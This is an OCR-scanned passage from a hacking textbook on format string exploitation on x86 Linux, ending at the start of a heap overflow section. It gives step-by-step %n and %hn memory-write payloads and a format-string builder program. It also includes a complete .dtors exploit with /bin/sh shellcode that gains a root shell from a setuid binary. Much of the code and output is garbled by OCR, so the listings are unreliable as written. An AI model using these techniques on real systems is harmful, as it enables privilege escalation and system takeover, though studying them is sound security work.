40042177, 2,bffffa0c, bffffald, 80482fa, 80484e0, 0, bffff9d8, 40042161,0,bffffal8, 4014f4dc, 

400L65f8,2,8048360,0, 8048381, 8048460,2,b£fifalc, 80482e4, 80484e0, 40008184, brfrrsic, 

40016bc0, 40001e01,bffffal8,2,bffffblc, bffffb24,0,bffffbbb, bffffbc5, bffffbe4, bfffibfc, 
bfifffcle, bffffc2a, bffffc34,bffffdf7,bffffelf, 

Here, a Perl command is used to specify 50 comma-delimited x format specifiers in the 
command line. This method, however, is not suitable for using in exploits. A better and sim- 
pler way of directly accessing the necessary parameter in the stack is to use the NS qualifier. 
For example, the $NSu specifier outputs the Nth parameter as an unsigned decimal integer. 
Consider the following command: 

PrintE("2Zth: *2$c, Sth: $5$c, 4th: S$4$x\n", ‘A’, "B', 'C', "BD", "E')? 


It produces this output: 

2th: B, Sth: BE, 4th: 44 

The first format specifier, 82$c, outputs the second argument of the function, which is the 
p character. The second specifier, 45$c, outputs the fifth argument, the E character. The last 
specifier, {4$x, outputs the fourth argument in the hexadecimal format (44 is the hexadecimal 
ASCII code for the Db character). 

In the same vein, the 50th value in the stack can be accessed as follows: 

# ./printf2 *#50\$x 

brtitelf 

The backslash escapes the $ character to prevent the shell from interpreting it. 

As you can see, the direct access method is simple to implement and works like clockwork. 

If the printf () function in the printf2 program (Listing 13.25) has a format specifier, 
for example, printf ("%s", argv(1]), traveling the stack would be impossible, because in this 
case there would be no format string vulnerability. 


13.3.3. Using the %n Format Specifier to Write 
to an Arbitrary Address 


Information presented in the preceding section is sufficient to view the stack; however, to 


write an exploit, you must be able to write to a necessary stack location (e.g., to rewrite a func- 
tion return address), 
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This task can be accomplished with the help of the ¢n format specifier. As you should 
recall, it writes into the argument the number of characters output up to the given moment 
(see Table 13.2). Consider a few examples to learn what can be accomplished using 
this specifier. 

Listing 13.26 shows a program that outputs the ten-character string ASCDEFGHIJ and uses 
the én format specifier to write this value into a variable named n. 





Listing 13.26. Using the on format specifier (printf3.c) 





Finclude <stdio.h> 


a 


int main () 
int nm, 


printt ("ABCDEFGHIJ¢n\n", &n); 
printf ("n=td\n", mn); 


return OU; 


Compile, execute, and view the results: 


# gcc printf3.c -o printfs 
# ./printf3 
ABCDEFGHIJ 


n=1L0 


The example shown in Listing 13.27 demonstrates how the number of bytes output before 
the &n specifier can be controlled. 





Listing 13.27. Controlling the number of bytes output before the %n apecitier ipanes o} 





#include <stdio.h> 


int main () 
{ 
int A, x = 1; 


printt ("ABCDEFGHIJ%.100dtn\n", x, &n); 
printf ("n=td\n", nj; 


return U; 





Compile, execute, and view the results: 


# goc printf4.c -o printf4 

# ./printf4 
ABCDEFGHTJOONN00000000000000000000000000000000000000000000000000000000000000000000000 
o00c000000000000000000001 

n=110 
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In the example, I used the %.100d precision parameter (a number following a decimal 
point) to obtain 100 bytes, which are then summed with the 10 bytes of the ABCDEFGHIJ string 
and written to the n variable. Instead of the precision parameter, the 100d minimum field 
width parameter (a number) can be used; in this case, 99 spaces will be output instead of 
zeros. Zeros can be output by placing the 0 flag before the field width value: $0100d. 

Now, learn to write to specific addresses. Listing 13.28 show a practice program for this 
objective. 





Listing 13.28. A vulnerable program (format.c) 





f#include <stdio.h> 


int main(int argc, char *argv[]) 
{ 


int a = 1; 
char buf[100]; 
int b = 1; 


printf ("a = td (tp)\n", a, &a); 
Print£t ("b = $d (%p)i\n", b, &b); 


snprintf (buf, sizeof buf, argv[1]); 
printf ("\nbuf: [%s]\n\n", buf); 
printf ("a = td (tp)\n", a, Ga}; 


printf ("b = $d (%p)\n", b, &b); 


return 0; 





Run the program, and you can view the results: 
# ./format "tx %x tx Sx" 

= 1 (Oxbffffatc) 
b= 1 (Oxbfff¢rs8c) 


buf: [40017098 4003087c 40017098 40000816) 


a=] (Oxbffffa0c) 
= 1] (Oxbfftfr98c) 


The snprintf() function in Listing 13.28 lacks a format specifier, meaning it has a format 
string vulnerability. This vulnerability will be used to change the value of the a and b variables. 
After the program is launched, the values of the a and b variables will be stored in the stack. 
To overwrite these variables with new values, you need to know their address in the stack. 
To keep the experiment simple, I included printf() functions in the program, which use 
the %p format specifier to show the addresses of both variables. In real programs, no one will 
show you any addresses. More printf () functions are placed after the snprintf() function; 
these show the changed values of the variables and the contents of the buf buffer. 

The value of first the a variable and then the b variable is changed. Consider the theory of 
how this is done. 
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As you already know, the $n format specifier writes at the address (specified by a pointer) 
that it obtains from the stack. Therefore, the address of the variable to change must be placed 
in the stack so that it could be then passed to the %n format specifier as a pointer. Executing 
the program reveals that the address of the a variable is the Oxbffffa0c value. This value is 
placed in the stack in the following format: \x0c\xfa\xff\xbf. The byte order must be re- 
versed because the x86 architecture stores bytes in memory in the little-endian format, that is, 
lower bytes are stored at lower addresses. This address will be the first item in the string passed 
to the vulnerable program. The snprintf£() function will place the address passed to it in the 
buf [100] buffer in the stack. Just placing the address in the stack, however, is not enough; it 
must also be found in there to be passed to the $n format specifier. In other words, you must 
travel through the stack to the location, at which the \x0c\xfa\xff\xbf address is stored, af- 
ter which the %n specifier will write a new value at this address. The most convenient way of 
traveling through the stack is to directly access it using the NS qualifier. 

Change the value of the a variable to 100. This value can be specified using the precision 
(a number following a point) or the minimum field width (a number) in the format specifier. 

Taking this theory into account, prepare a string and pass it to the program: 

# ./format ‘printf "\xOc\xfa\xff\xbi"’% .96x31\5n 

a=1 (Qxbffffa0c) 

b=1 (Oxbftttt9ac) 


but: 
[, SBHEQOOUOOOOONOOOONOODNDONOOONNODNDOCOODOOONOCONO0OONOOOOONOONODOOONOONOON0ONOO0000000 
o00000004001709) 


a=] (Qxbffftfadc) 

b=1 (Oxbffff9ac) 

Segmentation fault (core dumped) 

As you can see, the attempt to change the value of the variable was not successful, with the 
program crashing and dumping the core. This happened not because of any fundamental flaw 
in the design but simply because the program did not reach the location in the stack, into 
which the \xOc\xfa\xff\xbf address was placed; that is, the ¢n format specifier wrote the 
value to a random address in the stack, thereby crashing the program. The format string 
passed to the vulnerable program is designed correctly. Consider its main elements: 


O) ‘printf "\xO0c\xfa\xff\xbf"’ — To have the address of the variable interpreted as 
4 bytes and not as a regular string, the printf () shell command enclosed in accent-grave 
marks is used. 

C) %.96x — This specifier is needed only to specify the number of bytes to write to the vari- 
able, Because the value of 100 is supposed to be written, the .96 precision is set; the first 4 
address bytes in the string will also be counted. The type of the specifier does not matter; 
the important thing is that it be a type that works with integers: d, i, u, o, x, Or X. 

O %1\sn — The ¢n format specifier is given with the NS qualifier. Increment the value of the 
qualifier, starting with 1, until the address of the variable is found in the stack. When the ad- 
dress is found, the $n specifier will rewrite the value of the a variable with the new value of 100: 
# ./format “printf "\x0c\xfa\xff\xbf""%.96x%2\$n 
a=l (Oxbitffadc) 
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b=1 (Oxbf£firosc) 
Segmentation fault (core dumped) 


# ./format ‘printf "\xOc\xfa\xff\xbi""%.96x%3\$n 
a=l (Oxbffifadc) 
b=1 (Oxbffffrssc) 


but: 
[, SROOOdO0OOOOOOONONOOOONOOOOOOOOOOROOOONOOOOOODOOOOOOOOOROOO0ONDOOOOOOOOOOOODOOGOONN 
0O00000004001709) 


a=1 (Oxbffffa0c} 
b=1 (Oxbffrrsic) 
Segmentation fault (core dumped) 


# ./format ‘printf "\x0c\xfa\xff\xb£""%.96x84\$n 
a=l1 (Oxbfttfadc) 

b=1 (Oxbtrtrséc) 

scegmentation fault (core dumped) 


# ./format ‘printf “\xOc\xfa\xff\xbf""%.96x35\5n 
a=1 (Oxbtffita0c) 

b=1 (Oxbffffr9ec) 

Seqmentation fault (core dumped) 


# ./format “printf "\xOc\xfa\xff\xbf" 3.96xt6\$n 
a=] (Oxbtfffta0c) 
b=1 (Oxbftfrosc) 


buf: 
[, SHEOOOONOCOOOOOOONONOOOOOOOOONNOOOONOOOCONOOODDOOOOOONNNNONNOOOOOOOOOONNNNOOOOOOOND 
000000004001709] 


a=100 (Oxbtfffatc) 

b=1 (Oxb£f££fF98c) 

Bingo! On my machine, the variable is overwritten when the value of the qualifier is 6; 
the value on your machine may be different. 

In the same manner, the value of the b variable is overwritten with 31337. Simply place 
the address of the b variable, \x8c\xf9\xff\xbf, in the string. The value of the n$ qualifier 
does not have to be picked now and remains the same: 

# ./format “printf "\xbc\xf9\xtf\xbf "°%.31333x%6\5n 


a=] (OxbffffaNc) 
b=1 (Oxbffffoec) 


but: 
[pb BOOOOO00OODOOOOOOOOOOOOOOOOOOOOOO OOO OOOONOO0OO OOO OOOR0OONO00OOO0000000000000000000 
oo00000000000000) 


a=l (Oxbfffifa0c) 
be31337 (Oxbtttrsec) 
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In the preceding examples, variables were overwritten with relatively small values; how- 
ever, in real exploits, million of bytes must be written. For example, function return addresses, 
as a rule, are 100 million bytes. Take a typical address value of 0x8048360 (134,513,504 bytes 
in the decimal format). Write this value into the a variable: 

5 ./format “printf "\xfc\xf9\xff\xbf "°%.134513500x%6\$n 


b=1 (Oxbffitfrsic) 


but : 
[SHREOOOONONOOOOONDNOOOOOOONONONNOODONONOONOONOOOOOOOOOOONDOONNOONONOOOONON0000000000 
DOUCKOD0G00000D) 


a=134513504 (Oxbffff9fc) 

b=1 (Oxbffff97c) 

You may have to run the program twice to correct the variable’s address. In my case, 
it moved to address Oxbffff9fc. 

It took my machine, a 1.7 GHz Pentium 4, about 5 seconds to write the value; older ma- 
chines may take many minutes. Moreover, writing such a large value requires about 128 MB 
of memory! 

Real exploits employ memory-usage reduction techniques, which in turn reduce the exe- 
cution time. There are two such methods known: 

O Writing the offset 
0 Using the h modifier 
Consider both of these methods. 


13.3.4. Writing the Offset 


The essence of the offset-write method is that the value is formed sequentially byte by 
byte. For example, value 0xAABBCCDD 1s written to address x in four operations: 
0x000000DD is saved at address x 
0x000000CC is saved at address X + 1 


0x000000BB is saved at address X + 2 
OxO00O00AA is saved at address x + 3 


OQOQ0 


The upshot is a value written to the memory in the little-endian format: lower bytes at 
lower addresses, which is the x86 architecture rule (Fig. 13.5). 

Using the previous example (Listing 13.28), change the value of the a variable to 
Oxf0c67318 using the offset-write method. According to the method, the following four op- 
erations must be performed: 


C 6x00000018 Is saved at address Oxbffff9fc 
[J 0x00000073 1s saved at address OxbffffF9fd 
O 0x000000c6 is saved at address OxbfffFf9fe 
O 0x000000F0 is saved at address Oxbffffoft 
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Addresses: 


First write: 
Second write: 
Third write: 


Fourth write: 


Result: 





Fig. 13.5. Offset-write method 


Now build a format string and pass it to the vulnerable program: 


# ./format ‘print£t “\xec\xf9\xft\xbi\xed\xfO\xEf\xbt Hee \xf9\xEFf \ebt \xe ft \xf9\xit\ 
xbE""$.8xt6\Sn% .91x87\ S54. 83x48 \$nk.. 42xt9\$n 

a=] (Oubtfftf9ec) 

b=1 (Oxbftftfrto6c) 


[ JIE BS4 0017098 O000000000000000000000000000000000000000000000000000000000000 
000000000000000) 


a=-255429864 (Oxbffff9ec) 

b=1 (Oxbff£f96c) 

You may have to run the program twice to correct the variable’s address. In my case, 
it moved to address Oxbffff9ec. 

The hexadecimal version of the -255429864 value is Oxf0c67318. 

The function performed by each of the format string elements is as follows: 


O “printf "\xec\xf9\xff\xbf\xed\xf9\xff\xbf \xee\xf9\xff \xbf \xef \xf9\xff\xbi"" — 
First, four consecutive addresses are pushed onto the stack. To have the address inter- 
preted as a sequence of bytes and not as a regular string, the printf () shell command en- 
closed in accent-grave marks is used. 

(J %.8x%6\$n — Value 0x00000018 1s written to address Oxbffff9ec. Because the first four 
addresses in the string take 16 bytes, the precision option (%.8x) is used to set an addi- 
tional 8 bytes and obtain a total of 24 bytes (18h). 

O %.91x#7\$n — 0x00000073 is written to Oxbffff9ed. 

(} %.83x%8\Sn — 0x000000cé6 Is written to Oxbffff9ee. 

[] %.42x%9\$n — 0x000000£0 is written to address Oxbffff9ef. 


As you can see, the offset-write method not only works but works quickly and requires 
little memory. However, it has a significant limitation: The values in the format line that are 
written can only increase, because the ¢n format specifier sums all previous values. It works 
for the Oxf0c67318 number (18h < 73h < c6h < £0h), but, for example, the number 
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0x8048360 cannot be written using this method. Therefore, format-string exploits usually em- 
ploy the second method, using the h modifier, which allows the limitation of the offset 
method to be circumvented. 


13.3.5. Using the h Modifier 


By default, the &n specifier expects a pointer to an integer, that is, 4 bytes. But if you recall the 
construction of the format string, if the h modifier is used with the ¢n specifier, the corre- 
sponding argument must be treated as a pointer to short. Thus, using Shn specifier makes it 
possible to shorten the pointer to 2 bytes, making it short int. Consequently, the h modifier 
method allows the number that you want to write to be cut in two parts. The maximum size 
of a single part is Oxffff bytes (65,535 bytes in the decimal format). Writing this number 
takes little time and memory. For example, only two operations have to be performed to write 
number OxAABBCCDD to address x using the h modifier method: 


O oxccpp is saved at address x 
 OxAABB is saved at address X + 2 


Taking the example program from Listing 13.28, use the h modifier method to change the 
value of the » variable to 0x8048360. According to the method, the following two operations 
must be performed: 


OO 0ox8360 is saved at OxbffFfoac 
© 0x0804 is saved at OxbfffFF98c + 2 = OxbffFf9Be 


However, the smaller of the two numbers must be written first, because the $n format 
specifier sums all previous values; that is, the values written in the format string can only in- 
crease. Thus, first the 02x0804 = 2052 value is saved and then 0x8360 = 33632. 

Now build a format string and pass it to the vulnerable program: 

# ./format “printf "\x8e\xfO\xtf\xpi\x8c\xifS\xif\ebt" 4%. 2044xns6\Shnt. 21580xns7 \shn 


a=1 (Oxbttftfa0c) 
b=1 (Oxbfffrf9ec) 


but: 
[] HES gE ON DNDDDDDOOONONNONOOOONNNCONNNDODOOOONNDOOOOODNAONDNNNNOODCOOOOOODODONDONNN 
oo0000000000000) 


a=l1 (Umbftttatc) 
b=134513504 (Oxbffff98c) 
The number 134,513,504 in the hexadecimal format is 0x8048360. 
The function performed by each of the format string elements is as follows: 

O ‘printf “\x8e\xf9\xff\xbf\x8c\xf9\xff\xb£"* — Pushing both addresses onto the 
stack. The address of the lower value comes first. 

O %.2044x%6\$hn — Writing 0x0804 = 2,052 to address Oxbfff£98e. The precision is set 
to .2044 because the two addresses take 8 bytes (2,052 — 8 = 2,044). 
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O %.31580x37\$hn — Writing 0x8360 = 33,632 to address Oxbfff£98c. The precision is set 
to .31580 because 33,632 — 2,052 = 31,580. 


The information presented thus far is sufficient for writing a format string exploit. 


13.3.6. Creating a Format String Automatically 


A format string exploit must build a format string and then pass it to the vulnerable applica- 
tion. So you need a function to automatically form a format string depending on the values 
passed to it. Call this function frmstr builder (). 

The format string has the following structure: 

"[address] [address+2]%.([min value - §])x%[offset)]$hnt.[max value - min 

value]x% [offset+1}]$hn" 


To build the format string, the frmstr_builder() function takes only three arguments: 


Ol addr — The address, to which to write the value 
O value — The value to write (in the exploit, this value will be the shellcode’s address) 
O pos — The offset (in words) from the start of the vulnerable buffer 


First, the function must break down the address into individual bytes to place them in 
the format string in the little-endian format (the least significant byte at the lowest address). 
This task is carried out by the following four statements: 

bytel = (addr & Oxff000000) >> 24; 

bytez = (addr & Ox00ff0000) >> 16; 

bytes = (addr & OxD000ff00) >> 8; 

byted = (addr & O0x000000ff); 

Then, the most significant and the least significant parts of the value must be extracted. 
This is done using these statements: 

high = (value & OxfffrO0000) >> 16; 

low = (value & OxO0000ffff); 

Depending on which of the two parts is smaller, high or low, the format string is built. 
As already mentioned, values in the format string can only increase. 

The format string is built in the buf buffer, a pointer to which is returned by the function. 

To allow debugging, I placed fprintf(stderr, "...") statements in the code to observe 
different values. 

To check the frmstr builder() function operation, use it in a simple program, named 
frmbuilder.c (Listing 13.29). The program simply receives three arguments from the com- 
mand line (the address, value, and offset), passes them to the frmstr builder () function, 
and then outputs the string formatted by the function. 

Compile, execute, and view the results: 

# goc frmbuilder.c -o frmbuilder 

# ./frmbuilder bfffF98e 8048360 6 


addr : Oxbf£frTSec 
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bytel: Oxbf (©) 
byte2: Oxf£ ('b) 
byte3: Oxt9 (H) 
byte4: Ox8c (my) 
byte4+2: Ox8e (f) 

value: 134513504 (0x8048360) 


high: 2052 (Ox804) 
low: 33632 (0x8360) 
pos: 6 


2 
buf: (J Heo gHLO? .2044x%6Shn%.31580x%7$Shn] (33) 


Accent-grave marks can be used in the command line to allow frmbuilder to change val- 
ues automatically, as was done manually in the previous programs. For example, here is how 
the value of the a variable in the vulnerable program format (Listing 13.28) can be overwritten: 


# ./format *./frmbuilder brffft97c 8048360 6° 
addr: Oxbftfrroic 

bytel: Oxbf (@) 

byte2: Oxff ('b) 

bytes: Oxf9 (Hh) 

byted; Ox8c (ma) 

byte4d+2: Oxde (fh) 

value: 134513504 (O0x8048360) 


high: 2052 (Ox804) 
low: 33632 (Ox8360) 
pos: 6 


buf: [J pbtghsos .2044%%6Shn%.31580x%7Shn] (33) 


a=l1 (Oxbtitrotc) 
b=] (Oxbffiftioic) 


buf: 
(J Hee gHLO0000 * DD0DD0D0NDNDNONDDOOOOOONOOOOODOOODOOOODOOONDODODOOONOOOODOOOONOBNDNNNNN 
000000000000000) 


a=1 (Oxbffff9fc) 
b=134513504 (Oxbfff££97c} 
| had to run the program twice to correct the address of the b variable. 





Listing 13.29. Building the format string automatically (frmbuilder.c) 





#include <stdio.h> 
finclude <stdlib.h> 
#include <string.h> 


char* frmstr builder(unsigned long addr, unsigned long value, int pos) 
( 
char *buf; 


unsigned char bytel, bytez, byte3, byted; 
unsigned long high, low; 
int length = 100; 


bytel = (addr & Oxff000000) >> 24; 
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byte2 (addr & OxO00ff0000) >> 16; 
bytes = (addr & OxO000ff00) >> 6; 
byted = (addr & Ox000000ff); 


high = (value & Oxffff0000) >> 16; 
low = (value & OxOD000ffff); 


fprintf(stderr, “addr: ‘tun, addr); 

fprintf(stderr, “bytel: *#x (tc) \n", bytel, bytel); 
fprintf(stderr, “byted: $#x ($c) \n", byte2, byte2); 
fprintf(stderr, “bytes: t#x ($c) \n", bytes, bytes); 
fprintf(stderr, “byted: $#x ($c) \n", byted, byte4); 
fprintf(stderr, "byte4+2: %#x (%#c)\n",. byte4 + 2, byted + 2); 
fprintf(stderr, “value: $0 ($#x)\n", value, value); 
fprintf(stderr, “high: td (%#x)\n", high, high); 
fprintf(stderr, “low: $d ($#x)\n", low, low); 
fprintf(stderr, “pos: $d\n", pos); 


if { !{buf = (char*)malloc(length*sizeof(char))) ) { 
perror ("allocate buffer failed"); 
exit(0); 


} 
memset (buf, 0, sizeof (buf)); 
if (high < low) { 
snprintf (buf, 
length, 


"$ctctctc" 
"$ckctcsc" 


"$%. thax” 
"$ttd$hn" 


"$%. $hdx” 
“$tdShn", 


byte4 + 2, bytes, byte, bytel, 
byte4, byte3, byte2z, bytel, 


high - 8, 
pos, 


low - high, 
pos + 1); 


} else | 
snprintf (but, 
length, 
"Ectctctc" 
"sctctctc" 


"$%. thdx" 


Zaft 
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"$¢d$hn" 


"2%. thdx" 
"$¢¢dShn", 


byte4d + 2, Bytes, Bbytez, bytel, 
byte4, bytes, byte2, bytel, 


low - 8, 
pos + 1, 


high - low, 
Pos}; 

i 

return buf; 


int main(int argc, char *argv[]) { 
char *but; 
if {argc '= 4) { 
printf ("Usage: %s <address> <value> <position>\n", argv[0)); 
exit (0); } 
buf = Ermstr_builder(strtoul(argv(1], NULL, 16), 
strtoul(argv[2], NULL, 16), 


ateoi(argv[3])); 


fprintf (stderr, “buf: [%s] (%d)\n\n", but, strien(buf)); 
printt ("ts", but); 


return 0: 





In buffer-overflow exploits, the function return code is overwritten in the stack to pass 
control to the shellcode. The location to overwrite has to be guessed, because it is impossible 
to determine in advance where the return address is located in the stack. The format string 
vulnerability allows you to write to practically any address in the memory. Therefore, in for- 
mat-string exploits, you are not limited to the return address only. It is more convenient to 
overwrite constant addresses in a vulnerable program. Such addresses can be easily deter- 
mined with the help of the .dtors section and the global offset table. 


13.3.7. Constructor and Destructor Sections 


Each C file compiled using GCC contains special sections named .ctors and .dtors. 

The .ctors section is called the constructor section and stores pointers to the functions 
executed before the main() function is entered. 

The .dtors section is called the destructor section and stores pointers to the functions exe- 
cuted after the main () function is exited. 
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By default, both sections are blank; that is, they contain no function pointers. GCC offers 
special attributes — constructor and destructor — that allow programmers to declare 
functions as constructors or destructors in a program. In a program, these attributes are set 
as follows: 


static void start(void) $=attribute ((constructor)); 
static void stop(void) attribute ((destructor)); 


Listing 13.30 shows the source code for a simple program demonstrating how these 
attributes work. 





Listing 13.30. Using the constructor and destructor sections (cd_dtors.c) 








static void startivoid) attribute ((constructor)); 
Static void stop(void) attribute ({destructor)); 


int main() { 
printf ("This is main()\n"); 
return 0; 


} 


void start(void) { 


printiti"This is start()\n"); 
} 


void stop(void) { 
printf ("This is steop()\n"); 
I 





Compile, execute, and view the results: 

# gcc cd _dtors.c -o cd _dtors 

# ./od_dtors 

this is start() 

this is main() 

this is stop(} 

The .dtors and the .ctors section have the same construction: It is just a list of 32-bit 
addresses starting with Oxffffffff and ending with 0x00000000. 

The contents of the sections can be viewed using the obj dump utility: 

# objdump -s -j .ctors ./cd_dtors 

./cd dtors: file format elf32-1386 


Contents of section .ctors: 
§$049560 f££ffffrft 80e40408 oooon00d See nee ree 


# objdump -s -j .dtors ./cd dtors 
./cd_dtors: file format elf32-1386 


Contents of section .dtors: 
804956c fffffttf Se8e40408 ooOodd000 a ad at 
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The format, in which the objdump utility presents the sections’ contents, is somewhat con- 
fusing. The first address shown in the output (0x8049560 for .ctors and 0x804956c for 
.dtors) is just the address of the section’s location in the memory. It is followed by the actual 
contents of the section. The order of bytes is reversed; that is, the 0x98840408 address in the 
.dtors section Is actually 0x08048498. 

The most important feature of the .ctors and .dtors sections is that you can write 
to them. This means that you can rewrite one of the addresses in the section with a shellcode 
address, and when the program executes the control will be passed to this address. However, 
only the .dtors section is suitable for this purpose, because the exploit will have no time to 
change the address in the . ctors section before it is executed. 

It does not matter that in regular files the constructor and destructor sections are empty, 
because you can rewrite the last address, 0x0000000, with your shellcode address and execu- 
tion control will be passed to this address. 

Thus, all you have to do is to rewrite the address 4 bytes after the start of the .dtors sec- 
tion. The 4 bytes must be skipped to avoid overwriting the first address of the section, 
Oxffffffff; otherwise, the exploit will not work. 


13.3.8. Procedure Linkage and Global Offset Tables 


In addition to the .ctors and the .dtors sections, each ELF file contains two interlinked sec- 
tions: .plt and .got. These sections are used for calling shared library functions. The .plt 
section is called the procedure linkage table (PLT) and stores pointers to addresses in the .got 
section. Thus, the .p1t section is just an intermediary used to call shared functions; it does not 
store addresses. All addresses of the shared functions are stored in the .got section, called the 
global offset table (GOT). 

The .pit section is read only, so it’s of no interest to us; the .got section, however, can be 
written to. This makes it possible to replace the address of one the functions in GOT with the 
address of your shellcode, thus passing the control to it during the program’s execution. 

The objdump utility run with the -R flag outputs the addresses of the shared functions in 
GOT, along with the functions’ names, which makes it possible to determine the best function 
address to rewrite: 

# objdump -R ./format 

./format: file format elf32-1386 


DYNAMIC RELOCATION RECORDS 


OFFSET TYPE VALUE 

08049624 R_386 GLOB DAT __gmon_ start _ 
0804960c R386 JUMP SLOT — register frame info 
08049610 R386 JUMP SLOT jj deregister_ frame info 
08049614 R 386 JUMP SLOT  libec start main 
08049618 R 386 JUMP SLOT printf 

080496lc R386 JUMP SLOT —_ cxa finalize 


08049620 R_386 JUMP_SLOT snprintf 


For example, the address of the printf () function in the vulnerable format program can 
be overwritten. 
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13.3.9. Format String Exploit 


Listing 13.31 shows the source code for a .dtors section format-string exploit. The shellcode 
is passed to the vulnerable application using an environment variable. The offset (in words) 
from the start of the vulnerable buffer and the address, at which the value is to be written, are 
hard-coded in the exploit. I used an address from the .dtors section, so it is necessary to add 
4 to it (see Section 13.3.7). If an address from GOT is used, 4 does not have to be added to it. 

The contents of the fmt_str_creator() function are not shown in Listing 13.31 because 
they are the same as the contents of the frmstr_builder() function in Listing 13.29. 





Listing 13.31. A .dtors section format string exploit (expl_bss.c) 








#Hinclude <stdio.h> 

#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 


char buf[100]; 


char shellcode[] = 

"e355 \xc0" ye xorl teax, teax + 
"4\x31\xdb" /* xorl $ebx, tebx sid 
"\xbO\s1T" f* movb SOx17, tal ai 
"VxHCd x80" {* int SOx80 rd 
"\e35 \xC0" /* “worl teax, eax * / 
"\x31\xdb" i* xor] %ebx, %ebx id 
"\ebO\x2e" /* move SQu2e, tal a 


"\xcd\x80" /* int SO0x80 *y 
"\x31\xcO" /* xorl teax, teax ~*/ 
Ys s5or j® pushl eax * f 


"\xX6E""//sh" /* pushl SOx6e732f2f */ 
"\x68""/bin" /* pushl SOx6e69622f */ 
"\HBO\xeS" /* movl %esp, tebp */ 


"4x50" /* pushl %teax */ 
x53" /* pushl *%ebx */ 
"\x89\xel" /* movl tesp, tecx */ 
w\x99" /* cltd x 
"\xbO\x0b" j* movb SOxb, tal af 
axcd\x80"; /* int 30x80 a 


char *fmt str _creator(long addr, long value, int pos) { 


return buf; 
} 


int main{) 

{ 
char *eny[{] = {shellcode, NULL}; 
char buff[100]; 
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long RET; 
long ADDRESS = Oxsd0495f68 + 4; 
int ALIGN = 6; 


RET = OxcO000000 - strlen(shellcode) - strlen("./format") - 6; 
sprintf (buff, "ts", fmt str _creator(ADDRESS, RET, ALIGN)); 


execle("./format", "format", buff, NULL, env); 


Compile, run, and check out the results: 


# gcc format.c -o format 
# chmod ug+s ./format 
# ls -la ./ format 


-rwSr-sr-x l root root 13913 Apr 29 19:29 ./format 
# objdump -s -j .dtors ./format 
./format: file format elf32-1386 


Contents of section .dtors: 

B0495fe8 f£fffffftf OOOdo000 ee et 
# gcc expl_frm.c -o expl_frm 

# su nobody 

sh-2.045 id 

vid=99 (nobody) gid=99 (nobody) qroups=99 (nobody) 
sh-2.045 ./expl_frmm 

# ./format °./frmbuilder bEtf{ft9ic 8048360 6° 
addr: Oxb0495ac 

bytel: 0x8 | 

byte : Ox4d () 

byte3: 0x95 (*} 

byted: Oxfe (3) 

byted+2: Oxfe (4) 


value: -LO73741878 (Oxbftffftca) 
high: 49151 (Oxbfff) 

low: 65482 (Oxffca) 

pos: 6 


a=] (Oxbftiteéc) 
bel (Oxbititidec) 


but: 
fYSs0000000000000000000000000000000000000000000000000000000000000000000000000000000000 
H0000000) 


a=1 (Oxbffffebc) 

b@134513504 (Oxbfitfidec) 

sh-2.04# id 

uid=0 (root) gid=0(root) groups=99 (nobody) 
sh-2.04# 


The source codes for all programs in this section can be found in the /PART III/ 
Chapter 13/13.3 directory on the accompanying CD-ROM. 
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13.4. Heap Overflow 


The author of the technique for developing exploits based on a heap-overflow error is a Rus- 
sian hacker using the nickname of Solar Designer. On July 25, 2000, he published in Bugtraq 
information about the heap-buffer overflow error that he discovered in the Netscape browser 
and demonstrated an exploit based on this error. The information about the vulnerability and 
the exploit can be found at the SecurityFocus site (http://www.securityfocus.com/bid/1503) 
and at the Solar Designer site (http://www.openwall.com/advisories/OW-002-netscape-jpeg/ ). 

To be fair, in January 1999, one member of the wOOw00 hacker team, Matt Conover, 
published an article on the subject of a heap-buffer overflow (http://www.w00w00.org/files/ 
articles/heaptut.txt). But Conover only described primitive techniques, similar to those for 
overwriting function pointers considered in this chapter in Section 13.2. Solar Designer dis- 
covered a better technique involving the use of the internal memory allocation structure 
for overwriting arbitrary memory areas with the necessary data. The technique from Solar 
Designer is now used in all serious exploits based on the heap buffer overflow error. 
The details of this technique are considered in this section. 


13.4.1. Standard Heap Functions 


There are four standard C library functions for dynamically allocating and freeing memory in 
the heap. The following are their prototypes and man descriptions. 


O The void «malloc (size t size); function allocates size bytes of memory and re- 
turns a pointer to it or NULL if memory cannot be allocated. The allocated memory is 
not initialized. 

O The void *calloc (size_t nmemb, size t size); function allocates size bytes of mem- 
ory for each of the nmemb objects and returns a pointer to the allocated memory or NULL if 
memory cannot be allocated. The allocated memory is zeroed out. 

[| The void *realloc (void *ptr, size_t size); function changes the size of the dynamic 
memory pointed to by ptr (increases or decreases it, depending on the sign of the size 
argument) and returns a pointer to the new memory chunk. The new size is specified in 
bytes by the size argument. The added memory is not initialized. If ptr is NULL, the result 
of the call is equivalent to calling malloc(size); if size is 0, the result of the call is 
equivalent to calling free (ptr). Except when the ptr pointer is 0, it must point to the 
memory previously allocated using malloc (), calloc(), or realloc(). Increasing the size 
may cause the entire memory area to be moved to another location in the virtual memory, 
where the necessary free contiguous virtual address space is available. If the request fails or 
the new size is 0, the function returns NULL and the old memory block remains unmodi- 
fied: It is neither freed nor moved. 

O The void free (void *ptr); function frees the memory area previously allocated using 
the malloc(), calloc(), or realloc() function. The pointer to the memory area is passed 
using the ptr argument. 
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13.4.2. Vulnerability Example 


Consider a simple example of a vulnerable program (Listing 13.32). 





Listing 13.32. A vulnerable program (heap_vuln.c) 





#include <stdlib.h> 
#include <string.h> 


int main(int argc, char *argv[]) 
i 

char *a; 

cnar *b; 


a = malloc(200); 
b = malloc(64); 


printt("a = ¢p, b = tp, b - a = td\n\n", a, b, b- a)? 
strcepy(a, argv[1)); 


printt("a = $s (td) \n",. a, strlenta)); 
printr("b = ts (td) \n", b,; strlen(b)); 


free (a); 
free (Bb); 


return OQ; 





Compile the program, run it, and observe the results: 


# gcc heap vuln.c -o heap vuln 
# .fheap vuln ‘perl -e "print "A™x210'° 
a = Ox80497bs, b = ORB049888, b- a = 208 








DABARABRARAAARAAAARARARAARARADARARARBARAR (2710) 

b= AA (2) 

Segmentation fault (core dumped} 

The program declares two buffers in the heap; the first is 200 bytes and the other is 
64 bytes. The strepy() function, which does not check the size of the destination buffer, 
means a string of any length can be written to the first buffer. 

As an example, a string of 210 A characters is passed to the vulnerable program from the 
command line. As a result, the first buffer overflows and the program terminates abnormally. 
But there is certain peculiarity here, absent when the stack and BSS buffer overflow errors 
were considered (Sections 13.1 and 13.2, respectively). When the program crashes, the contents 
of the first overflowed buffer are 210 bytes, but only 2 bytes (two A characters) were written 
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to the second buffer. The program also shows the buffers’ addresses in the heap and the differ- 
